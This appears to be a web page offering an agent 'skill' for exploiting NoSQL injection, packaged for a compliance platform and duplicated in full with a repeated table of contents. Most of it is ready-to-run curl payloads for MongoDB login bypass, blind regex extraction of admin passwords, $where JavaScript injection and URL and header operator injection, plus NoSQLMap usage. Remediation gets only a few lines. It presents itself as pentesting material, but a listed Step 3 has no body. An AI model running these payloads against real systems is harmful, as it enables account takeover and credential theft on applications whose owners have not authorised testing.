Exploiting NoSQL Injection Vulnerabilities

When to Use

During web application penetration testing of applications using NoSQL databases
When testing authentication mechanisms backed by MongoDB or similar databases
When assessing APIs that accept JSON input for database queries
During bug bounty hunting on applications with NoSQL backends
When performing security code review of database query construction

Prerequisites

Burp Suite Professional or Community Edition with JSON support
NoSQLMap tool installed (pip install nosqlmap or from GitHub)
Understanding of MongoDB query operators ($ne, $gt, $regex, $where, $exists)
Target application using a NoSQL database (MongoDB, CouchDB, Cassandra)
Proxy configured for HTTP traffic interception
Python 3.x for custom payload scripting

Workflow

Step 1 — Identify NoSQL Injection Points

# Look for JSON-based login forms or API endpoints
# Common indicators: application accepts JSON POST bodies, uses MongoDB
# Test with basic syntax-breaking characters
curl -X POST http://target.com/api/login \
  -H "Content-Type: application/json" \
  -d '{"username": "admin\"", "password": "test"}'

# Test for operator injection in query parameters
curl "http://target.com/api/users?username[$ne]=invalid"

# Check for error-based detection
curl -X POST http://target.com/api/search \
  -H "Content-Type: application/json" \
  -d '{"query": {"$gt": ""}}'

Step 2 — Perform Authentication Bypass

# Basic authentication bypass with $ne operator
curl -X POST http://target.com/api/login \
  -H "Content-Type: application/json" \
  -d '{"username": {"$ne": "invalid"}, "password": {"$ne": "invalid"}}'

# Bypass with $gt operator
curl -X POST http://target.com/api/login \
  -H "Content-Type: application/json" \
  -d '{"username": {"$gt": ""}, "password": {"$gt": ""}}'

# Target specific user with regex
curl -X POST http://target.com/api/login \
  -H "Content-Type: application/json" \
  -d '{"username": "admin", "password": {"$regex": ".*"}}'

# Bypass using $exists operator
curl -X POST http://target.com/api/login \
  -H "Content-Type: application/json" \
  -d '{"username": {"$exists": true}, "password": {"$exists": true}}'

# Extract username character by character using $regex
# Test if first character of admin password is 'a'
curl -X POST http://target.com/api/login \
  -H "Content-Type: application/json" \
  -d '{"username": "admin", "password": {"$regex": "^a"}}'

# Test if first two characters are 'ab'
curl -X POST http://target.com/api/login \
  -H "Content-Type: application/json" \
  -d '{"username": "admin", "password": {"$regex": "^ab"}}'

# Enumerate usernames with regex
curl -X POST http://target.com/api/login \
  -H "Content-Type: application/json" \
  -d '{"username": {"$regex": "^adm"}, "password": {"$ne": "invalid"}}'

Step 4 — Exploit JavaScript Injection via $where

# JavaScript injection through $where operator
curl -X POST http://target.com/api/search \
  -H "Content-Type: application/json" \
  -d '{"$where": "this.username == \"admin\""}'

# Time-based detection with sleep
curl -X POST http://target.com/api/search \
  -H "Content-Type: application/json" \
  -d '{"$where": "sleep(5000) || this.username == \"admin\""}'

# Data exfiltration via $where with string comparison
curl -X POST http://target.com/api/search \
  -H "Content-Type: application/json" \
  -d '{"$where": "this.password.match(/^a/) != null"}'

Step 5 — Use NoSQLMap for Automated Testing

# Clone and setup NoSQLMap
git clone https://github.com/codingo/NoSQLMap.git
cd NoSQLMap
python setup.py install

# Run NoSQLMap against target
python nosqlmap.py -u http://target.com/api/login \
  --method POST \
  --data '{"username":"test","password":"test"}'

# Alternative: use nosqli scanner
pip install nosqli
nosqli scan -t http://target.com/api/login -d '{"username":"*","password":"*"}'

Step 6 — Test URL Parameter Injection

# Parameter-based injection (GET requests)
curl "http://target.com/api/users?username[$ne]=&password[$ne]="
curl "http://target.com/api/users?username[$regex]=admin&password[$gt]="
curl "http://target.com/api/users?username[$exists]=true"

# Array injection via URL parameters
curl "http://target.com/api/users?username[$in][]=admin&username[$in][]=root"

# Inject via HTTP headers if processed by backend
curl http://target.com/api/profile \
  -H "X-User-Id: {'\$ne': null}"

Key Concepts

Concept	Description
Operator Injection	Injecting MongoDB operators ($ne, $gt, $regex) into query parameters
Authentication Bypass	Using operators to match any document and bypass login checks
Blind Extraction	Character-by-character data extraction using $regex boolean responses
$where Injection	Executing arbitrary JavaScript on the MongoDB server via $where operator
Type Juggling	Exploiting how NoSQL databases handle different input types (string vs object)
BSON Injection	Manipulating Binary JSON serialization in MongoDB wire protocol
Server-Side JS	JavaScript execution context available in MongoDB for query evaluation

Tools & Systems

Tool	Purpose
NoSQLMap	Automated NoSQL injection detection and exploitation framework
Burp Suite	HTTP proxy for intercepting and modifying JSON requests
MongoDB Shell	Direct database interaction for testing query behavior
nosqli	Dedicated NoSQL injection scanner and exploitation tool
PayloadsAllTheThings	Curated NoSQL injection payload repository
Nuclei	Template-based scanner with NoSQL injection detection templates
Postman	API testing platform for crafting NoSQL injection requests

Common Scenarios

Login Bypass — Bypass MongoDB-backed authentication using {"$ne": ""} operator injection in username and password fields
Data Enumeration — Extract database contents character by character using $regex blind injection when no direct output is visible
Privilege Escalation — Modify user role fields through NoSQL injection in profile update endpoints
API Key Extraction — Extract API keys or tokens stored in MongoDB collections through boolean-based blind techniques
Account Takeover — Enumerate valid usernames via regex injection then brute-force passwords through operator-based authentication bypass

Output Format

## NoSQL Injection Assessment Report
- **Target**: http://target.com/api/login
- **Database**: MongoDB 6.0
- **Vulnerability Type**: Operator Injection (Authentication Bypass)
- **Severity**: Critical (CVSS 9.8)

### Vulnerable Parameters
| Endpoint | Parameter | Injection Type | Impact |
|----------|-----------|---------------|--------|
| POST /api/login | username | Operator ($ne) | Auth Bypass |
| POST /api/login | password | Regex ($regex) | Data Extraction |
| GET /api/users | id | $where JS Injection | RCE Potential |

### Proof of Concept
- Authentication bypass achieved with: {"username":{"$ne":""},"password":{"$ne":""}}
- Extracted 3 admin passwords via blind regex injection
- JavaScript execution confirmed via $where operator

### Remediation
- Use parameterized queries with MongoDB driver sanitization
- Implement input type validation (reject objects where strings expected)
- Disable server-side JavaScript execution ($where) in MongoDB config
- Apply least-privilege database access controls

Verification Criteria

Confirm successful execution by validating:

[ ] All prerequisite tools and access requirements are satisfied
[ ] Each workflow step completed without errors
[ ] Output matches expected format and contains expected data
[ ] No security warnings or misconfigurations detected
[ ] Results are documented and evidence is preserved for audit

Compliance Framework Mapping

This skill supports compliance evidence collection across multiple frameworks:

SOC 2: CC6.1 (Logical Access), CC8.1 (Change Management)
ISO 27001: A.14.2 (Secure Development), A.14.1 (Security Requirements)
NIST 800-53: SA-11 (Developer Testing), SI-10 (Input Validation), SC-18 (Mobile Code)
OWASP LLM Top 10: LLM01 (Prompt Injection), LLM02 (Insecure Output)

Claw GRC Tip: When this skill is executed by a registered agent, compliance evidence is automatically captured and mapped to the relevant controls in your active frameworks.

Deploying This Skill with Claw GRC

Agent Execution

# Install via CLI
npx claw-grc skills add exploiting-nosql-injection-vulnerabilities

# Or load dynamically via MCP
grc.load_skill("exploiting-nosql-injection-vulnerabilities")

Audit Trail Integration

When executed through Claw GRC, every step of this skill generates tamper-evident audit records:

SHA-256 chain hashing ensures no step can be modified after execution
Evidence artifacts (configs, scan results, logs) are automatically attached to relevant controls
Trust score impact — successful execution increases your agent's trust score

Continuous Compliance

Schedule this skill for recurring execution to maintain continuous compliance posture. Claw GRC monitors for drift and alerts when re-execution is needed.

Exploiting NoSQL Injection Vulnerabilities

When to Use

During web application penetration testing of applications using NoSQL databases
When testing authentication mechanisms backed by MongoDB or similar databases
When assessing APIs that accept JSON input for database queries
During bug bounty hunting on applications with NoSQL backends
When performing security code review of database query construction

Prerequisites

Burp Suite Professional or Community Edition with JSON support
NoSQLMap tool installed (pip install nosqlmap or from GitHub)
Understanding of MongoDB query operators ($ne, $gt, $regex, $where, $exists)
Target application using a NoSQL database (MongoDB, CouchDB, Cassandra)
Proxy configured for HTTP traffic interception
Python 3.x for custom payload scripting

Workflow

Step 1 — Identify NoSQL Injection Points

# Look for JSON-based login forms or API endpoints
# Common indicators: application accepts JSON POST bodies, uses MongoDB
# Test with basic syntax-breaking characters
curl -X POST http://target.com/api/login \
  -H "Content-Type: application/json" \
  -d '{"username": "admin\"", "password": "test"}'

# Test for operator injection in query parameters
curl "http://target.com/api/users?username[$ne]=invalid"

# Check for error-based detection
curl -X POST http://target.com/api/search \
  -H "Content-Type: application/json" \
  -d '{"query": {"$gt": ""}}'

Step 2 — Perform Authentication Bypass

# Basic authentication bypass with $ne operator
curl -X POST http://target.com/api/login \
  -H "Content-Type: application/json" \
  -d '{"username": {"$ne": "invalid"}, "password": {"$ne": "invalid"}}'

# Bypass with $gt operator
curl -X POST http://target.com/api/login \
  -H "Content-Type: application/json" \
  -d '{"username": {"$gt": ""}, "password": {"$gt": ""}}'

# Target specific user with regex
curl -X POST http://target.com/api/login \
  -H "Content-Type: application/json" \
  -d '{"username": "admin", "password": {"$regex": ".*"}}'

# Bypass using $exists operator
curl -X POST http://target.com/api/login \
  -H "Content-Type: application/json" \
  -d '{"username": {"$exists": true}, "password": {"$exists": true}}'

# Extract username character by character using $regex
# Test if first character of admin password is 'a'
curl -X POST http://target.com/api/login \
  -H "Content-Type: application/json" \
  -d '{"username": "admin", "password": {"$regex": "^a"}}'

# Test if first two characters are 'ab'
curl -X POST http://target.com/api/login \
  -H "Content-Type: application/json" \
  -d '{"username": "admin", "password": {"$regex": "^ab"}}'

# Enumerate usernames with regex
curl -X POST http://target.com/api/login \
  -H "Content-Type: application/json" \
  -d '{"username": {"$regex": "^adm"}, "password": {"$ne": "invalid"}}'

Step 4 — Exploit JavaScript Injection via $where

# JavaScript injection through $where operator
curl -X POST http://target.com/api/search \
  -H "Content-Type: application/json" \
  -d '{"$where": "this.username == \"admin\""}'

# Time-based detection with sleep
curl -X POST http://target.com/api/search \
  -H "Content-Type: application/json" \
  -d '{"$where": "sleep(5000) || this.username == \"admin\""}'

# Data exfiltration via $where with string comparison
curl -X POST http://target.com/api/search \
  -H "Content-Type: application/json" \
  -d '{"$where": "this.password.match(/^a/) != null"}'

Step 5 — Use NoSQLMap for Automated Testing

# Clone and setup NoSQLMap
git clone https://github.com/codingo/NoSQLMap.git
cd NoSQLMap
python setup.py install

# Run NoSQLMap against target
python nosqlmap.py -u http://target.com/api/login \
  --method POST \
  --data '{"username":"test","password":"test"}'

# Alternative: use nosqli scanner
pip install nosqli
nosqli scan -t http://target.com/api/login -d '{"username":"*","password":"*"}'

Step 6 — Test URL Parameter Injection

# Parameter-based injection (GET requests)
curl "http://target.com/api/users?username[$ne]=&password[$ne]="
curl "http://target.com/api/users?username[$regex]=admin&password[$gt]="
curl "http://target.com/api/users?username[$exists]=true"

# Array injection via URL parameters
curl "http://target.com/api/users?username[$in][]=admin&username[$in][]=root"

# Inject via HTTP headers if processed by backend
curl http://target.com/api/profile \
  -H "X-User-Id: {'\$ne': null}"

Key Concepts

Concept	Description
Operator Injection	Injecting MongoDB operators ($ne, $gt, $regex) into query parameters
Authentication Bypass	Using operators to match any document and bypass login checks
Blind Extraction	Character-by-character data extraction using $regex boolean responses
$where Injection	Executing arbitrary JavaScript on the MongoDB server via $where operator
Type Juggling	Exploiting how NoSQL databases handle different input types (string vs object)
BSON Injection	Manipulating Binary JSON serialization in MongoDB wire protocol
Server-Side JS	JavaScript execution context available in MongoDB for query evaluation

Tools & Systems

Tool	Purpose
NoSQLMap	Automated NoSQL injection detection and exploitation framework
Burp Suite	HTTP proxy for intercepting and modifying JSON requests
MongoDB Shell	Direct database interaction for testing query behavior
nosqli	Dedicated NoSQL injection scanner and exploitation tool
PayloadsAllTheThings	Curated NoSQL injection payload repository
Nuclei	Template-based scanner with NoSQL injection detection templates
Postman	API testing platform for crafting NoSQL injection requests

Common Scenarios

Login Bypass — Bypass MongoDB-backed authentication using {"$ne": ""} operator injection in username and password fields
Data Enumeration — Extract database contents character by character using $regex blind injection when no direct output is visible
Privilege Escalation — Modify user role fields through NoSQL injection in profile update endpoints
API Key Extraction — Extract API keys or tokens stored in MongoDB collections through boolean-based blind techniques
Account Takeover — Enumerate valid usernames via regex injection then brute-force passwords through operator-based authentication bypass

Output Format

## NoSQL Injection Assessment Report
- **Target**: http://target.com/api/login
- **Database**: MongoDB 6.0
- **Vulnerability Type**: Operator Injection (Authentication Bypass)
- **Severity**: Critical (CVSS 9.8)

### Vulnerable Parameters
| Endpoint | Parameter | Injection Type | Impact |
|----------|-----------|---------------|--------|
| POST /api/login | username | Operator ($ne) | Auth Bypass |
| POST /api/login | password | Regex ($regex) | Data Extraction |
| GET /api/users | id | $where JS Injection | RCE Potential |

### Proof of Concept
- Authentication bypass achieved with: {"username":{"$ne":""},"password":{"$ne":""}}
- Extracted 3 admin passwords via blind regex injection
- JavaScript execution confirmed via $where operator

### Remediation
- Use parameterized queries with MongoDB driver sanitization
- Implement input type validation (reject objects where strings expected)
- Disable server-side JavaScript execution ($where) in MongoDB config
- Apply least-privilege database access controls

Verification Criteria

Confirm successful execution by validating:

[ ] All prerequisite tools and access requirements are satisfied
[ ] Each workflow step completed without errors
[ ] Output matches expected format and contains expected data
[ ] No security warnings or misconfigurations detected
[ ] Results are documented and evidence is preserved for audit

Compliance Framework Mapping

This skill supports compliance evidence collection across multiple frameworks:

SOC 2: CC6.1 (Logical Access), CC8.1 (Change Management)
ISO 27001: A.14.2 (Secure Development), A.14.1 (Security Requirements)
NIST 800-53: SA-11 (Developer Testing), SI-10 (Input Validation), SC-18 (Mobile Code)
OWASP LLM Top 10: LLM01 (Prompt Injection), LLM02 (Insecure Output)

Claw GRC Tip: When this skill is executed by a registered agent, compliance evidence is automatically captured and mapped to the relevant controls in your active frameworks.

Deploying This Skill with Claw GRC

Agent Execution

# Install via CLI
npx claw-grc skills add exploiting-nosql-injection-vulnerabilities

# Or load dynamically via MCP
grc.load_skill("exploiting-nosql-injection-vulnerabilities")

Audit Trail Integration

When executed through Claw GRC, every step of this skill generates tamper-evident audit records:

SHA-256 chain hashing ensures no step can be modified after execution
Evidence artifacts (configs, scan results, logs) are automatically attached to relevant controls
Trust score impact — successful execution increases your agent's trust score

Continuous Compliance

Schedule this skill for recurring execution to maintain continuous compliance posture. Claw GRC monitors for drift and alerts when re-execution is needed.

Prerequisites

Exploiting NoSQL Injection Vulnerabilities

When to Use

Prerequisites

Workflow

Step 1 — Identify NoSQL Injection Points

Step 2 — Perform Authentication Bypass

Step 3 — Extract Data Using Boolean-Based Blind Injection

Step 4 — Exploit JavaScript Injection via $where

Step 5 — Use NoSQLMap for Automated Testing

Step 6 — Test URL Parameter Injection

Key Concepts

Tools & Systems

Common Scenarios

Output Format

Verification Criteria

Compliance Framework Mapping

Deploying This Skill with Claw GRC

Agent Execution

Audit Trail Integration

Continuous Compliance

Use with Claw GRC Agents

Tags

Related Skills

Exploiting SQL Injection with Sqlmap

Exploiting Type Juggling Vulnerabilities

Performing Second Order SQL Injection

Exploiting HTTP Request Smuggling

Exploiting IDOR Vulnerabilities

Exploiting Insecure Deserialization

Prerequisites

Exploiting NoSQL Injection Vulnerabilities

When to Use

Prerequisites

Workflow

Step 1 — Identify NoSQL Injection Points

Step 2 — Perform Authentication Bypass

Step 3 — Extract Data Using Boolean-Based Blind Injection

Step 4 — Exploit JavaScript Injection via $where

Step 5 — Use NoSQLMap for Automated Testing

Step 6 — Test URL Parameter Injection

Key Concepts

Tools & Systems

Common Scenarios

Output Format

Verification Criteria

Compliance Framework Mapping

Deploying This Skill with Claw GRC

Agent Execution

Audit Trail Integration

Continuous Compliance

Use with Claw GRC Agents

Tags

Related Skills

Exploiting SQL Injection with Sqlmap

Exploiting Type Juggling Vulnerabilities

Performing Second Order SQL Injection

Exploiting HTTP Request Smuggling

Exploiting IDOR Vulnerabilities

Exploiting Insecure Deserialization